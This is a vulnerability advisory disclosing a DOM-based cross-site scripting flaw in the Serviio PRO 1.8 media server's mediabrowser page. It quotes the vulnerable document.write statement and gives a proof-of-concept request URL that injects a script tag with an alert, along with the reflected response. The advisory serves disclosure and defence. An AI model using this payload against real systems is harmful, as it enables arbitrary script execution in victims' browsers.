Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) DOM Based XSS
Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.
Desc: The application is vulnerable to a DOM-based cross-site scripting. Data is
read from document.location and passed to document.write() via the following statement
in the response: document.write('<base href="' + document.location + '" />');
This can be exploited to execute arbitrary HTML and script code in a user's browser DOM
in context of an affected site.
Tested on: Restlet-Framework/2.2
Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5406
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
12.12.2016
--
Request:
http://172.19.0.214:23424/mediabrowser/#/browse/V_F?title=Folders&b=Home&b=Video&bid=0"><script>alert("ZSL")</script>
Element response:
<base href="http://172.19.0.214:23424/mediabrowser/#/login?title=Folders&b=Home&b=Video&bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E">